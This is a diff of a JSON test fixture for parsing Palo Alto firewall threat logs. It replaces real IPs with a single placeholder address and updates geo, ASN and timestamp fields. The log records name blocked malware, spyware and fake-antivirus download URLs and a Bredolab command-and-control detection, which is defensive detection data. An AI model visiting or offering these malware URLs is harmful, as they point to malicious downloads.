@@ -5979,14 +5961,14 @@ ], "ip": [ "192.168.0.2", - "89.108.64.156", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545626922Z", - "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079261700Z", + "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6009,23 +5991,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 197695, + "number": 4837, "organization": { - "name": "Domain names registrar REG.RU, Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.108.64.156" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6041,7 +6025,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6082,7 +6066,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:a3rlKRtYt43mps+uHBznJUtG3Qg=", + "community_id": "1:u3SLWX+WInAjEpFvbgZJ7ppjDRY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6118,14 +6102,14 @@ ], "ip": [ "192.168.0.2", - "89.108.64.156", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545634212Z", - "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079267400Z", + "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -6162,28 +6146,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, - "message": "204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6224,7 +6207,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:gfZAOGdC3xAoPZCFZCwHJJ7Iin4=", + "community_id": "1:1QAo/7Uu2ZnQ3tX0xM16HUiNjrs=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -6259,15 +6242,15 @@ "crusher" ], "ip": [ - "204.232.231.46", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 1, - "ingested": "2021-09-08T12:37:05.545641375Z", - "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079273200Z", + "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2012-10-30T09:53:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6287,26 +6270,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-ON", - "city_name": "Kitchener", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Canada", - "region_name": "Ontario", + "region_name": "Jilin", "location": { - "lon": -80.4216, - "lat": 43.4419 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 13727, + "number": 4837, "organization": { - "name": "NEXT DIMENSION INC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "216.8.179.25" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6322,7 +6304,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6363,7 +6345,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VeoAydUSFUdh8ZddIqbsMY32sBU=", + "community_id": "1:fAZZS4QiYR9HRv2mpevkcTa8bEI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6399,14 +6381,14 @@ ], "ip": [ "192.168.0.2", - "216.8.179.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545648429Z", - "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", + "ingested": "2021-12-09T13:42:59.079277300Z", + "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "created": "2012-10-30T09:53:38.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6429,23 +6411,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 22489, + "number": 4837, "organization": { - "name": "Castle Access Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "69.43.161.154" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6461,7 +6445,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6502,7 +6486,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZsFVG8FJVifp8WmzI9Zj/lo+dB4=", + "community_id": "1:xI/vHpVryFpDr9TeLpa+sn06lIg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6538,14 +6522,14 @@ ], "ip": [ "192.168.0.2", - "69.43.161.154", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545655591Z", - "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079282Z", + "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:53:48.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6568,23 +6552,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "British Virgin Islands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Virgin Islands British", + "region_name": "Jilin", "location": { - "lon": -64.5, - "lat": 18.5 - }, - "country_iso_code": "VG" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.91.196.252" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6600,7 +6586,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6641,7 +6627,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NAfQ33YdKJSvbcxpFK8HIhI39lk=", + "community_id": "1:UYDmWKyJJKqYep7xR0rD4zO6+ME=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6677,14 +6663,14 @@ ], "ip": [ "192.168.0.2", - "208.91.196.252", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545662712Z", - "original": "Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", + "ingested": "2021-12-09T13:42:59.079287400Z", + "original": "Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "created": "2012-10-30T09:53:58.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6707,23 +6693,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6739,7 +6727,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6780,7 +6768,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AMcTUl91PN0z8TJr2QwdEOP+Fmo=", + "community_id": "1:Q4nvWFoSeEki/rbya7cqvARiQi8=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6816,14 +6804,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545669877Z", - "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079292300Z", + "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:55:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6846,26 +6834,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -6881,7 +6868,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6922,7 +6909,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7Tdwe73AJMSdJL4hxpQDyl5Lwn4=", + "community_id": "1:6ovStyNF6gHrKTo/Q05+3qFBMNM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -6958,14 +6945,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545677102Z", - "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079296300Z", + "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:56:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6988,26 +6975,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7023,7 +7009,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7064,7 +7050,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q7ERSuCoAPSiI8xLXZCI+1M9B8I=", + "community_id": "1:Xm3NWlcLQMLGItqDbcIMdKH+qek=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -7100,14 +7086,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545684398Z", - "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079300900Z", + "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7130,26 +7116,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7165,7 +7150,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7206,7 +7191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AsPpOgQhhKdBtPhY4zahdBuNcTc=", + "community_id": "1:d7zW/Z+qbkM84EVWHsgcDUV40MY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -7242,14 +7227,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545691808Z", - "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079305200Z", + "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": 